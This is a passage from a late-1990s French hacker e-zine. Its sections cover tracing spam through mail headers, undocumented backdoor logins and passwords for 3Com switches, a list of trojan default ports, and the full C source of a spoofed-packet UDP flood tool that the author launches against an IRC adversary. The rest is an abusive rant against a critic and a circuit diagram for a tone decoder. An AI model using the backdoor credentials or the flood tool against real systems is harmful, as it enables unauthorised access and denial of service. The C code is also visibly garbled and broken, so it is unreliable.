adresses trouvées dans les groupes de news, mailing list, site Web, pour se créer une banque de données d'adresses email. En ce qui concerne Geocites.com ou USA.net, ces boites étant gratuites, et ayant un très gros trafic par jour, l'administration de ces boites est parfois totalement négligée, pas de filtrages anti spam, ce qui n'est pas le cas chez la pluspart des fournisseurs d'accès internet. Un exemple concret, l'arrêt provisoire mais total des serveurs Mail de USA.NET il y a maintenant 6 mois suite a l'utilisation de ces serveurs de mail comme relais pour des email de type publicitaires. Comment lutter contre les spammers??? C'est un peut comme jouer au chat et a la sourie. Premièrement, ne JAMAIS répondre à un spammer. Souvent, le message vous est envoyé sans que l'expéditeur ne connaisse réellement votre adresse email, et le fait de lui répondre, lui permet de " valider " votre adresse email. Certains messages du genre " Si vous ne désirez plus recevoir ces informations, renvoyez ce message avec la mention " unsubscribe ", peuvent etre un moyen détourner de connaitre votre adresse email (NDRL : Les salauds !! Les salauds !!). D'une manière générale, se méfier de tout message dont vous ne connaissez pas l'expéditeur. Ne jamais donner son adresse email réelle sans que cela ne soit réellement nécessaire. Dans les groupes de News, indiquer une adresse du genre: " jean_duchmol@NOSPAMgeocities.com " suivis du message " Remove NOSPAM to respond ". LES MOYENS TECHNIQUES POUR RETROUVER UN EMAIL SPAMMER: (Le mail ci-dessous est pris totalement a titre d'exemple, les commandes utilisées sont des commandes sous Unix ou Linux, mais peuvent tout a fait etre adaptées sous Windows. [ Pour ceux qui l'utilise encore ;-)) ]. Supposons que vous ayez reçu l'email ci-dessous, nous affichons a l'écran le mail en affichant aussi le " Header " ou " entete " du mail. (Pour ceux qui sont par exemple sous un lecteur de mail type Netscape, pour les autres, les pures et durs, la question ne se pause meme pas. ). ---------------------------------------------------------------- Received: from mail.gnn.com (70.los-angeles-3.ca.dial-access.att.net [165.238.38.70]) by mail-e2b-service.gnn.com (8.7.1/8.6.9) with SMTP id BAA14636; Sat, 17 Aug 1996 01:55:06 -0400 (EDT) Date: Sat, 17 Aug 1996 01:55:06 -0400 (EDT) Message-Id: <199608170555.BAA14636@mail-e2b-service.gnn.com> To: Subject: FREE HEAVEN. From: FREE@Heaven.com " FREE " House and lot in " HEAVEN " Reserve yours now, do it today, do not wait. It is FREE just for the asking. You receive a Personalized Deed and detailed Map to your home in HEAVEN. Send your name and address along with a one time minimum donation of $1.98 cash, check, or money order to help cover s/h cost TO: Saint Peter's Estates P.O. Box 9864 Bakersfield,CA 93389-9864 This is a gated community and it is " FREE ". Total satisfaction for 2 thousand years to date. >From the Gate Keeper. (PS. See you at the Pearly Gates) GOD will Bless you. ---------------------------------------------------------------- Nous pouvons nous douter a coup sur que l'en-tête de ce mail est faux. Le but du Spammer est de vous atteindre a coup sur, mais de se protéger de son coté de vos réponses ou insultes. Nous utilisons, donc la commande " whois " illegal# whois heaven.com nous avons la réponse: Time Warner Cable Broadband Applications (HEAVEN-DOM) 2210 W. Olive Avenue Burbank, CA 91506 Domain Name: HEAVEN.COM Administrative Contact, Technical Contact, Zone Contact, Billing Contact: Melo, Michael (MM428) michael@HEAVEN.COM (818) 295-6671 Record last updated on 02-Apr-96. Record created on 17-Jun-93. Domain servers in listed order: CHEX.HEAVEN.COM 206.17.180.2 NOC.CERF.NET 192.153.156.22 ---------------------------------------------------------------- suite a cela nous allons vérifier l'adresse d'expédition: illegal# finger FREE@heaven.com nous avons la réponse suivante: [heaven.com] finger: heaven.com: Connection timed out Plusieurs possibilitées suite a cette réponse: soit l'administrateur du système de heaven.com a désactivé le port " finger ", soit heaven.com n'est pas actif. Nous allons tester cette hypothese avec la commande " ping ". illegal# ping heaven.com la réponse est: heaven is alive Cela veux dire que heaven.com est bien " actif " a ce moment donné. Nous testons cela par: illegal# telnet heaven.com nous devrions arriver a un écran nous demandant un " login " et un " password ", a la place de cela nous avons par exemple: Trying 198.182.200.1 ... telnet: connect: Connection timed out Maintenant, nous savons que les gens ne peuvent pas se connecter a distance a heaven.com. Donc, nous pouvons en déduire que le spam n'a surement pas été envoyé de cette endroit. Vérifions maintenant, chex.heaven.com est ce de là que le Spam a été envoyé? essayons: illegal# telnet chex.heaven.com 79 (79 port finger) Nous avons la réponse: Trying 201.202.203.204 ... telnet: connect: Connection timed out donc, ni heaven.com ni chex.heaven.com n'ont pu etre utilisé par des personnes pour envoyer du mail. Donc ce sont 2 liens faux dans le " header " du mail. Essayons maintenant: illegal# whois gnn.com la réponse est: America Online (GNN2-DOM) 8619 Westwood Center Drive Vienna, VA 22182 USA Domain Name: GNN.COM Administrative Contact: Colella, Richard (RC1504) colella@AOL.NET 703-453-4427 Technical Contact, Zone Contact: Runge, Michael (MR1268) runge@AOL.NET 703-453-4420 Billing Contact: Lyons, Marty (ML45) marty@AOL.COM 703-453-4411 Record last updated on 07-May-96. Record created on 22-Jun-93. Domain servers in listed order: DNS-01.GNN.COM 204.148.98.241 DNS-AOL.ANS.NET 198.83.210.28 Bingo, gnn.com est hébergé par America Online. AOL est un réseau informatique possédant des passerelles vers l'Internet. Revenons donc a notre " entete " de mail spam. illegal# whois att.net La réponse est: AT&T EasyLink Services (ATT2-DOM) 400 Interpace Pkwy Room B3C25 Parsippany, NJ 07054-1113 US Domain Name: ATT.NET Administrative Contact, Technical Contact, Zone Contact: DNS Technical Support (DTS-ORG) hostmaster@ATTMAIL.COM 314-519-5708 Billing Contact: Gardner, Pat (PG756) pegardner@ATTMAIL.COM 201-331-4453 Record last updated on 27-Jun-96. Record created on 13-Dec-93. Domain servers in listed order: ORCU.OR.BR.NP.ELS-GMS.ATT.NET199.191.129.139 WYCU.WY.BR.NP.ELS-GMS.ATT.NET199.191.128.43 OHCU.OH.MT.NP.ELS-GMS.ATT.NET199.191.144.75 MACU.MA.MT.NP.ELS-GMS.ATT.NET199.191.145.136 Bingo, encore un domain valide. Le coupable a donc pu envoyer son spam soit de heaven.com soit de gnn.com soit de att.net. Nous savons qu'il a peu de chance que cela soit de " heaven.com " puisque nous n'avons même pas eu de réponse du port login. Mais il reste encore: att.net et gnn.com qui sont fortement suspects. La dernière étape est donc, d'envoyer une copie du spam reçu avec sont header à la fois a postmaster@gnn.com et a runge@AOL.NET qui est listé par whois comme contact technique, ainsi que: postmaster@att.net ou bien hostmaster@ATTMAIL.COM (le contact technique). Avec un peux de chance, une de ces personne en lisant son courrier pourra utiliser le " ID number " du spam pour retrouver qui a falsifié ce mail et la plupart du temps, résilier le compte internet du coupable. Restez toujours poli avec ces personnes, elles sont là pour administrer le réseau et sont de votre coté. (la plupart du temps ;-)) Ne vous amusez pas à retrouver vous même le Spamer pour le bombarder d'insultes, cela n'avance a rien, (NDRL : Si ça soulage comme dirait un certain Ingénieur conseil que je connais ;) et vous devenez vous meme le spamer. Si vous vous trompez de destinataire, lui ne vous ratera pas, et peux vous " pourrir " la vie. Personnellement, il y a plusieurs années, suite a une petite dispute, disons plutôt divergence de point de vue, je me suis retrouvé avec 40 mails par jours concernant la culture isoponique des laitues. Depuis, je suis incollable sur le sujet ;-))) Très intéressant d'ailleurs. !!! Non sans dec !!! Ma seule parade a été de moi même remonter le responsable de ce mail a la source, et de faire pareil. Ce n'est pas une solution croyez moi ... Respectez les autres et l'on vous respectera. Passez toujours par le responsable ou l'administrateur réseau, il est comme vous, il n'aime pas du tout héberger des gens pratiquant le spamming. PROCHAIN ARTICLE: La culture de la betterave sucrière sur les haut plateaux Tibétains. (Article qui sera réalisé par Bill Gates, suite a une reconversion forcée de son équipe et de lui même.) __________________\|/__________________ ----===ILLEGAL===---- /|\ "If Hacking is illegal, knowledge is illegal." ICQ N. 7812204 ill3gal@(NOSPAM)geocities.com http://www.geocities.com/SiliconValley/Lakes/6154/ ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ IV]Les failles made in 3COM Systèmes affectés : Les systèmes tournant sur les switches 3COM (CoreBuilder LAN et SuperStack II) Je tiens tout d'abord à remercier Eric Monti à qui nous devons la découverte de cette faille dans le système de sécurité des switches 3COM... Cette backdoor est en fait un niveau d'accès non documenté par nos amis de chez 3com ;) Sans doute ont ils oubliés de l'inclure dans leurs docs par inadvertance, aussi j'aurai la bonté de le faire à leur place et gratuitement... Cette backdoor affecte les versions dites "intelligentes" et "étendues" des progs de switching pour les switches Lanplex/Corebuilder. En effet, en plus des classique account "admin", "read", et "write", il y a un autre account: LOGIN : debug PASS : synnet Cet account à certaines particularités : Il possède non seulement tous les privilèges du compte 'admin', mais également quelques commandes de debugging qui ne sont disponibles sous aucun autre compte. En effet, avec un simple 'telnet', en vous loggant en 'debug', vous pouvez changer tous les autres mots de passe, y compris celui du compte 'admin', sans pour autant posséder, l'ancien !!! Cela vous permet donc d'avoir un contrôle absolument complet sur le switche! Vous pouvez même en bloquer l'accès à son propriétaire... (qui à dit que les réseaux switchés étaient les plus sécurisés ?). Cette technique a été vérifiée sur : Lanplex/CoreBuilder 2500s (SW versions 7.x et 8.x) CoreBuilder 3500 (Version 1.0.0.) 3Com LANplex 2500 (rev 7.15) avec la version 7.0.1-19. Il existe une backdoor similaire qui marche sur LinkSwitch 2700 et CELLplex 7000 : LOGIN : tech PASS : tech Bon un petit résumé : CoreBuilder 6000/2500 -username: debug password: synnet CoreBuilder 7000 -username: tech password; tech SuperStack II Switch 2200 -username: debug password: synnet SuperStack II switch 2700 -username: tech password: tech Pendant qu'on y est, sachez également que vous pouvez trouver sur les SuperStack II switch 1000 (et 3000), l'account 'monitor', password 'monitor'. Pour tout vous dire sachez qu' à l'usine sont mis en place les account suivant : 'monitor', 'manager', et 'security' : Le pass étant le nom du compte (manager;manager). Et il arrive fréquemment que les administeurs oublient de changer les 3... BONUS : 3com Netbuilders vous voulez récupérer les clefs SNMP et les password admin ? pas de prob ;) enterprises.synernetics.lanplex.lanplexSystemsMib.1.19.0 = "password" enterprises.synernetics.lanplex.lanplexSystemsMib.6.7.0 = "public" #Brain Override# -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- V]Liste des ports par défaut utilisés par les trojans. Et bien je dirai en commentaire que ca peut toujours servir. port 21 - Blade Runner, Doly Trojan, Fore, FTP trojan, Invisible FTP, Larva, WebEx, WinCrash port 23 - Tiny Telnet Server port 25 - Antigen, Email Password Sender, Haebu Coceda, Kuang2, ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy port 31 - Agent 31, Hackers Paradise, Masters Paradise port 41 - DeepThroat port 58 - DMSetup port 79 - Firehotcker port 80 - Executor port 110 - ProMail trojan port 121 - JammerKillah port 421 - TCP Wrappers port 456 - Hackers Paradise port 531 - Rasmin port 555 - Ini-Killer, Phase Zero, Stealth Spy port 666 - Attack FTP, Satanz Backdoor port 911 - Dark Shadow port 999 - DeepThroat port 1001 - Silencer, WebEx port 1011 - Doly Trojan port 1012 - Doly Trojan port 1024 - NetSpy port 1045 - Rasmin port 1090 - Xtreme port 1170 - Psyber Stream Server, Voice port 1234 - Ultors Trojan port 1243 - BackDoor-G, SubSeven port 1245 - VooDoo Doll port 1349 (UDP) - BO DLL port 1492 - FTP99CMP port 1600 - Shivka-Burka port 1807 - SpySender port 1981 - Shockrave port 1999 - BackDoor port 2001 - Trojan Cow port 2023 - Ripper port 2115 - Bugs port 2140 - Deep Throat, The Invasor port 2565 - Striker port 2583 - WinCrash port 2801 - Phineas Phucker port 3024 - WinCrash port 3129 - Masters Paradise port 3150 - Deep Throat, The Invasor port 3700 - Portal of Doom port 4092 - WinCrash port 4567 - File Nail port 4590 - ICQTrojan port 5000 - Bubbel, Back Door Setup, Sockets de Troie port 5001 - Back Door Setup, Sockets de Troie port 5321 - Firehotcker port 5400 - Blade Runner port 5401 - Blade Runner port 5402 - Blade Runner port 5555 - ServeMe port 5556 - BO Facil port 5557 - BO Facil port 5569 - Robo-Hack port 5742 - WinCrash port 6400 - The Thing port 6670 - DeepThroat port 6771 - DeepThroat port 6776 - BackDoor-G, SubSeven port 6939 - Indoctrination port 6969 - GateCrasher, Priority port 7000 - Remote Grab port 7300 - NetMonitor port 7301 - NetMonitor port 7306 - NetMonitor port 7307 - NetMonitor port 7308 - NetMonitor port 7789 - Back Door Setup, ICKiller port 9872 - Portal of Doom port 9873 - Portal of Doom port 9874 - Portal of Doom port 9875 - Portal of Doom port 9989 - iNi-Killer port 10067 - Portal of Doom port 10167 - Portal of Doom port 10520 - Acid Shivers port 10607 - Coma port 11000 - Senna Spy port 11223 - Progenic trojan port 12223 - Hack´99 KeyLogger port 12345 - GabanBus, NetBus, Pie Bill Gates, X-bill port 12346 - GabanBus, NetBus, X-bill port 12361 - Whack-a-mole port 12362 - Whack-a-mole port 12631 - WhackJob port 13000 - Senna Spy port 16969 - Priority port 20001 - Millennium port 20034 - NetBus 2 Pro port 21544 - GirlFriend port 22222 - Prosiak port 23456 - Evil FTP, Ugly FTP port 26274 (UDP) - Delta Source port 29891 (UDP) - The Unexplained port 30029 - AOL Trojan port 30100 - NetSphere port 30101 - NetSphere port 30102 - NetSphere port 30303 - Sockets de Troie port 31337 - Baron Night, BO client, BO2, Bo Facil port 31337 (UDP) - BackFire, Back Orifice, DeepBO port 31338 - NetSpy DK port 31338 (UDP) - Back Orifice, DeepBO port 31339 - NetSpy DK port 31666 - BOWhack port 33333 - Prosiak port 34324 - BigGluck, TN port 40412 - The Spy port 40421 - Agent 40421, Masters Paradise port 40422 - Masters Paradise port 40423 - Masters Paradise port 40426 - Masters Paradise port 47262 (UDP) - Delta Source port 50505 - Sockets de Troie port 50766 - Fore port 53001 - Remote Windows Shutdown port 54321 - School Bus port 60000 - Deep Throat port 61466 - Telecommando port 65000 - Devil #Brain.Override# -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- VI] Liste de quelques sites interessants. Et oui, une simple liste.. N'empêche que ce ne sont pas forcemment les plus connus les meilleurs. Alors bon surf ;) http://www.sendmail.org http://www.cypango.net/~spam/ http://www.tis.com http://www.cert.org http://iris.acs.neu.edu/~goedicke/security.html http://www.wolfenet.com/~jhardin/ipwadm.html http://www.users.interport.net/~reptile/linux/index.html http://www.ecst.csuchico.edu/~jtmurphy/ http://www.erols.com/avenger/ http://www.rootshell.com/ http://www.dna.lth.se/~erics/linux.html http://www.sophist.demon.co.uk/ping/index.html http://www.cs.iastate.edu/~ghelmer/unixsecurity/unix_vuln.html http://www.geek-girl.com/bugtraq/ http://www.greatcircle.com/pkt_filtering.html http://www.tiac.net/users/steveg/security.html -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- VII] Conseal Pc firewall... Il est 2H00 du mat, les yeux éclatés vous essayer de comprendre ce que vous avez codé vous même pendant 3 jours sans dormir... Vous n'en pouvez plus, vous décidez de vous détendre un moment avec vos potes sur IRC. Connection établie.. Je me tape la causette avec mon pote Snowcrash. Soudain, une fenêtre s'ouvre: Et mec, je suis ARCHANGEL le meilleur des hackers !! Je te défie en COMBAT singulier, Je suis un R3AL H4ck3R moi ! Je ferme la fenêtre et je continue ma causette.. Quelques secondes plus tard : t'as pas compris ou quoi ? Tu t'écrases, t'es qu'une merde !! FUCK OFF !! T'façons j'ai mis mes protection je suis invincible avec mon super firewall.. Même que j' ai fais sauter la protection de la limitation dans le temps. T'es mort mon gars !!! C'est bien t'as trouvé le crack de conseal sur Astalavista, maintenant écrase, Je cause et je te trouve nuisible ok ? Vas sur #L4m3rZ et fais pas chier. Eh ?? T'as essayé de pirater mon ordi ?? Je vais te winnuker t'es mort, dans quelques secondes tu es déconnecté.. Dommage pour lui, mais sur mon firewall linux, le port 139 n'est pas ouvert... Bon il est temps de régler son compte à ce blaireau.. Je lance ce programme génial qu'est TuneEmul et je lance une session telnet sur un de mes serveurs linux. Ensuite je compile ce petit programme. #include #include #include #include #include #include #include #include #include #include #include #ifdef BROKEN_LIBC #include #else #define u_char unsigned char #define u_short unsigned short #endif strict sockaddr sa; int main(int argc,char **argv) { int fd; int x=1; int hosti=192; int hostii=168; int hostiii=1; int meep=0; int fooport=1; int numpack=0; char funhost[15]; struct sockaddr_in *p; struct hostent *he; u_char gram[36]= { 0x45, 0x00, 0x00, 0x26, 0x12, 0x34, 0x00, 0x00, 0xff, 0x11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x00, 0x12, 0x00, 0x00, '3','1','3','3','7','8','9','0' }; if(argc!=3) { fprintf(stderr,"Saihyousen, by Noc-Waggge\n"); fprintf(stderr,"The faster your connection to the internet is (latency wise, not bandwith)\n"; fprint(stderr,"and the lower the CPU speed of the victim will\nincrease probability of success\n"; fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen 127.0.0.1 40000\n",*argv); exit(1); }; if((fd=socket (AF_INET,SOCK_RAW,IPPROTO_RAW))==-1) { perror("requires RAW SOCKETS"); exit(1); }; #ifdef IP_HDRINCL if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0) { perror("setsockopt IP_HDRINCL"); exit(1); }; #else fprintf(stderrn,"we don't have IP_HDRINCL :-(\n\n"); #endif /* The stuff below is so that it's not fully sequencial i.e 100.100.100.101, 100.100.100.102 */ for (numpack=0;numpack<=atoi(argv[2];numpack++) { if (meep=0) { ++hosti; meep++;} if (hosti>254) hosti=1; if (meep==1) { ++hostii; meep++;} if (hostii>254) hostii=1; if (meep==2) { ++hostiii; meep=0;} if (hostiii>254) hostiii=1; sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti); (he=gethostbyname(funhost)); bcopy(*(he->h_addr_list),(gram+12),4); if((he=gethostbyname(argv[1]))==NULL) { fprintf(stderr,"can't resolve destination hostname\n"); exit(1); }; bcopy(*(he->h_addr_list),(gram+16),4); fooport++; /* resets the port to 1 if it's nearing the end of possible values */ if (fooport>65530) (fooport=1;); *(u_short*)(gram+20)=htons((u_short)fooport); *(u_short*)(gram+22)=htons((u_short)fooport); p=(struct sockaddr_in*)&sa; p->sin_family=AF_INET; bcopy(*(he->h_addr_list),&(p->sin_addr),siezof(struct in_addr)); if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1) { perror("sendto"); exit(1); }; /*printf("Packet # %i\n", numpack); */ /* Turn that on to see where you are.. it'll slow the attack though */ }; printf("Attack against %s finished", argv[1]); putchar('\n'); return 1; } N'oublions pas de remercier Max Schau qui est l'auteur de cet exploit. Petit message avant le lancement du programme : C'est l'heure d'aller se coucher pour les lamers.. HEIN ?? La chance accorde ses faveurs aux esprits avertis. #Brain.Override# ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ VIII] ZIPIZ Vous avez surement vu récemment le dernier site qui tord le cou à l'underground ! : zipiz.com. Bon bref résumé : ce site est en gros une parodie du site zataz.com, où tout ce qui touche à l'underground est tourné à la dérision. Bon avouons quelque chose, du point de vu technique, le site a été extrèmement bien réalisé : c'est du travail d'artiste. Mais quand au contenu... Exemple : Morceaux choisis : "Ce mois-ci, un de mes préférés : Brain Override, 23 ans. Activités principales : auteur-compositeur au bontempi à pédale, science-fiction, magie noire et courses chez Auchan Aubagne. Bref, le prototype du Jean-Kevin. Mon modèle. Il publie l'un des zines underground les plus débiles disponibles sur le marché : "le Cyber Hacker's Guide". Un seul numéro pour l'instant !" Primo : je n'ai jamais caché mon age.. (ni mon nom d'ailleurs...) Secundo : Il me serait difficile d'aller faire mes courses à Aubagne, vu que j'habite aux caraïbes et je ne m'en cache pas à Saint Barths. Cependant il se trouve que je rentre en France, alors promis zipiz j'habiterai pas trop loin de Auchan Aubagne, comme çà tu auras moins l'air d'un blaireau. Tertio : Je ne suis pas auteur-compositeur, mais auteur interprète. Quattro : il est vrai que j'aime assez la science-fiction mais quand à la magie noire, heu... oui mais dans les jeux de rôles... Pour finir, je ne suis pas boutonneux et les seules lunettes que je porte sont des lunettes de soleil. Bon çà c'était un peu le coup de gueule perso mais attaquons nous au reste... Voyons un peu le niveau de ce monsieur qui a l'air de si bien nous connaître : "C’est sûr que comme les hackers n’ont strictement aucune information intéressante à partager avec qui que ce soit, ils ont tout à gagner dans ce partage. Néanmoins, le piratage de la NASA n’ayant d’autres intérêts que de dénicher les horaires de la navette spatiale et le pirate ayant peu de chance de se retrouver un jour en position de postuler à un emploi d’hôtesse de l’espace, on se demande à quoi pourrait bien lui servir cette information. Mais bon : Free ze information..." Bon déjà on peut voir le quotient intellectuel du gars... Ok cela ne vole pas haut, mais regardons de plus près : En fait cet individu cherche à tourner à la dérision l'underground car il ne dispose en fait d'aucun argument réel à nous opposer.. Alors la seule chose qu'il sait faire c'est rire. Je cite : "Il publie l'un des zines underground les plus débiles disponibles sur le marché : "le Cyber Hacker's Guide". Notre sous-homme préféré l'a t'il seulement lu ? Où sont les critiques constructives ? Bon le même : "Mais foin de subtilités linguistiques. Pour simplifier, sur ce site, le hacker, le cracker, le pirate et le trou du cul désigne la même personne : un casse-couilles qui bave de contentement à l'idée d'entrer dans des endroits où personne ne l'a invité. Point." Tout d'abord sachez que des gens comme Stallman se considèrent eux-même comme des hackers. Un tel manque de respect est totalement injustifiable, de la part de quelqu'un qui pourtant se sert d'un ordinateur, et surtout... d'internet. Car sans ces gens qu'il appelle des casse-couilles ou des trous du cul, il ne pourrait avoir un site internet... Mais bon chez ce genre de débile,on ne cherche pas trop à comprendre. A noter égalemement que ce monsieur écrivait dans son site que j'étais parano en citant non pas moi mais michel arboi qui avait un problème avec ses clefs PGP. Vous voyez donc le genre.. Débile et mythomane. Allez encore une : "j'ai quand même du mal à comprendre en quoi un quarteron de retardés boutonneux postant des pages constellées de têtes de mort en flamme sur multimania peut être porteur d'un idéal communautaire." Vu la fixation de ce personnage sur les boutons, il a du avoir une adolescence difficile... Peut être des problèmes plus intimes... Mais bon, après tout les problèmes sexuels ou hormonaux de ce monsieurne nous regarde absolument pas. Heureusement pour lui le viagra et les poupées gonflables devraient arranger cà !!! "Toutes les utopies n'ayant pu trouver à s'expérimenter ou ayant échoué dans le monde réel cherchent à couvrir le net de qualités topologiques ou sociales (le village planétaire) qu'il n'a pas et essaient de le remplir d'une population virtuelle qui n'existe pas. Un cyber trou du cul est encore et d'abord un vrai trou du cul. C'est vrai qu'il est plus simple de taguer 3 pages en HTML que de réinvestir l'île de la tortue pour y festoyer et plus si affinités. Mais bon c'est quand même pas le même trip" Sans commentaires... "Le métier de "profiler" de pirates est d'une telle facilité qu'il ferait passer un emploi fictif de la mairie de Paris pour une corvée de chiotte dans un régiment de diarrhéiques.." De pire en pire... "L'arme nécessaire et suffisante pour la chasse aux pirates ça n'est pas le calibre 12 mais DejaNews. Ce site permet de faire des recherches dans tous les newsgroups de la terre et de sa périphérie. Tapez le pseudo débile du hacker à identifier et vous connaîtrez en 3 secondes sa vie intime : ses préoccupations, ses angoisses, sa marque de céréales préférée et, les bons jours, son numéro de sécurité sociale. Dans le pire des cas, relancez la recherche sur ses centres d'intérêts spécifiques (Goldorak, les blondes au gros seins, les centrales nucléaires peintes en bleu etc...) et vous découvrirez ses autres pseudonymes et finalement, au détour d'un post anodin sur fr.misc.handicap apparaîtra : jean-kevin.leboulet@groslamer.com" Pour l'instant la seule chose que j'ai pu constater c'est que ce cher zipiz ne sait pas s'en servir (il faut vraiment être con !) voir : erreur michel arboi.. Bref ce gars ne sait même pas se servir de Deja-New : LA TACHE PAR EXCELLENCE !! Ne pas savoir lire une entête,et en plus publier le résultat sur le web, il faut être con !! "Ils se croient indétectables en passant par 12 anonymizers à travers la planète mais ils écrivent leurs petites annonces, racontent leur déboire sentimental (le pluriel est superflu), répondent à la plus petite provocation en déballant les moindres détails de leur pauvre vie sans aspérité : "j'ai passé trois mois en emploi d'jeun au Mac D... du boulevard Mac D.. du 8 au 12 février 1999, donc je sais de quoi je parle !". "je cherche un appartement près de mon boulot à...", "ma copine est coréenne et son chien moldave", "je vends ma télé, mon micro-onde, un canapé-lit et une red hat pas déballée", "je cherche du boulot en Corée" (bon débarras), "j'ai vu le même portable au Auchan à Aubagne", "qui connaît un médicament efficace contre l'acné juvénile", "cherche un fiancé pour mon hamster Pépette, pas sérieux s'abstenir" etc..." Pour commencer, quelqu'un qui a des compétences de hacker, ne travaille pas dans un "mac do" et n'est pas en emploi jeune !! Pour ce qui est du portable à auchan aubagne (vu que cette phrase est de moi), je resignale à ce monsieur que je vis aux Caraïbes (mais évidemment j'ai des amis en métropole...) Zipiz a peut être fait ce site pour réussir à dénicher quelqu'un de plus con que lui... Qu'il se rassure, il est bien le seul à être aussi bête. "Limite, ça peut devenir amusant pour celui que ça amuse. A la fin de ce voyage au bout de la bêtise, vous en reviendrez avec l'éternelle constatation : "Mais comment peut-on être aussi con ?" Sacré zipiz tu en sais quelque chose !!! Voir : Notre bonhomme fait sur son site la pub d'une boite qui teste la sécurité de votre PC.. Allez y si vous voulez vous marrez. Même pas spoofé, et sous Windaube, ces champions de la sécurité informatique ne renvoient même pas la bonne IP et répondent attention faible vulnérabilité car le port telnet est ouvert... On peut voir que les gens que recommande zipiz sont à la hauteur de son quotient intellectuel. Pour clore cet article, je dirai qu'il est dommage de voir ainsi du talent gaché, mais à ce niveau là je pense que c'est irrécupérable : Les boeufs resteront des boeufs !!! #Brain.Override# ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ IX] Un décodeur de tonalité Un décodeur de tonalité est un système capable de reconnaître une fréquence et de donner un ordre lors de la réception de cette fréquence. Le modèle que je vais vous proposer est un modèle triple,capable de reconnaître trois fréquences différentes. Personnellement, je m'en sert avec un téléphone mais rien ne vous empèche de l'utiliser avec un magnétophone ou autre chose... Disons que si vous êtes vraiment parano et que vous voulez déclencher à distance la destruction de votre ordinateur (bien que vous puissiez vous en servir pour tout autre chose), ce montage pourra vous être utile. Le schéma étant identique pour les trois fréquences, il vous suffit de le reproduire 3 fois. Le circuit utilisé est un LM, XR, NE567. Bien que vous puissiez le remplacer avec quelque chose de beaucoup plus récent, ce montage est parfaitement fonctionnel et efficace pour un coup dérisoire. Si vous souhaitez vous pouvez utiliser une version à faible consommation comme le XRL567 mais vous aurez alors l'inconvénient d'un courant de sortie plus faible... A vous de voir. Le circuit intégré étant spécifique, il s'utilise en général en suivant les recommandations du fabricant. L'astuce suivante ne se trouve pas dans les notes d'applications ; elle consiste à relier 2 condensateurs à la broche 2, ce qui rend le verrouillage du détecteur indépendant des fluctuations de tension provoquées par la consommation du relais lorsque le montage fonctionne sur piles. La fréquence est déterminée par le réseau P1, R1 C5 : F0 = 1/R x C5, R étant la somme P1+R1. Le signal d'entrée est ajusté par P1. Le montage est plus sélectif avec une basse tension d'entrée (environ 30 mV). La tension d'alimentation des relais peut être séparée de celle du décodeur, on peut utiliser des relais 12V et installer, entre cette alimentation et la ligne allant aux bornes 4 de CI 1, un régulateur 5V. Lorsque le décodeur reçoit un signal à la fréquence d'accord de l'oscillateur du CI(sur la borne 5 on a un signal carré à la fréquence d'accord), la sortie passe à 0. Vous pouvez en fait réunir le nombre de filtres que vous souhaitez et vous règlerez chacun d'eux à une fréquence différente. Vous choisirez les fréquences à l'intérieur d'une octave, car le circuit est sensible aux harmoniques. Les condensateur sont au tantale, ce qui permet d'avoir des dimensions réduites. Personnellement je personnalise chaque montage en fonction du relais que je vais utiliser, ce qui permet avec la conception du circuit à double faces (merci eagle), de disposer d'un montage à la taille extrêmement réduite. Par contre si vous le souhaitez, vous pouvez préparer un circuit qui acceptera tous les types de relais. On peut prévoir le remplacement du relais R11, par un relais bistable à deux bobines (Siemens P1 ou D1), le relais R1 étant alors omis. Un cavalier alimentera alors la seconde bobine. Le réglage se fait à l'aide d'un générateur AF, on injecte une tension, on règle la fréquence par l'un des potentiomètres ajustables. Bon je vous laisse à votre montage ;) Nomenclature des composants : Résistances 1/4 W 5% : R1, R11, R21 : 82 Ohms Condensateurs : C1, C11, C21 : 22 nF MKT 5 mm C2, C12, C22 : 0,33 uF tantale goutte 10 V C3, C13, C23 : 0,68 uF tantale goutte 10 V C4, C14, C24 : 2,2 uF tantale goutte 10 V C5, C15, C25 : 10 nF MKT 5 mm Semi-conducteurs : CI1 : Circuit intégré LM, NE, XR 567 D1, D11, D21 : diode silicium 1N4148 Divers : P1, P2, P11, P21 : potentiomètre ajustable vertical 47 KOhms Re1, Re11, Re21 : relais type P1, D1 Siemens, Taiko NXE, Oucsh original etc... Type monostable ou bistable à deux bobines (Re11). Tension suivant l'utilisation : 5 ou 12 V Le schéma électrique : ---------------+-------+----------------------------------------------* | | | | | | -----+--------------------------* | | | Tension suivant | | +-----+ Relais | | | | |-----| +---------* C3 __|__ | D1 _|_ +--| Re | | 13 _____0,68 | 11 /_\ | 1 | *__.______* 23 | uF | 8 21 | | 11 | * | |-------|---------+--------| 21 | | | 2| CL1 |5 |-----| +---------* C1,11,21 +---| 11 21 |--------------+ | | 22 nF | 3| LM567 |6 | +-| |------------|-------|----+ |-|/ P1, 11 ,21 | | | | 1| |7 | |/| 57 KOhms -+ | C2,12| | | | /|-| |P2 | 22 __|__ | | | | | | | _____ | | | |-| R1, 11, 21 | |<-+ 0,33uF| | | | | | 82 KOhms | | | | | | |-| | | | | | | | | | | +---------+ | |C4 |24 | | | |14__|__ | __|__ | | _____ | _____ C5, 15 ,25 | 2,2 uF| | | 10 nF -+----------------+----+----+----------------+--------------------------* Bonne chance !! #Brain.Override# ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ X] Qu'est-ce qu'un hacker ? Pour les uns, un hacker est un génie de l'informatique, un créateur ; Pour les autres c'est un assoifé de connaissances voulant en apprendre le plus possible sur les systèmes, pour d'autres encore, c'est quelqu'un qui veut mesurer ses capacités à déjouer des systèmes de protection, ou encore pour Zipiz, un trou du cul. Je ne vous apporterai pas LA réponse (bien que je pense que zipiz est un peu à coté de la plaque). Le mot "hacker" a été créé il y a de nombreuses années, par tous ceux qui sont les concepteurs de ce qui est aujourd'hui devenu Internet, 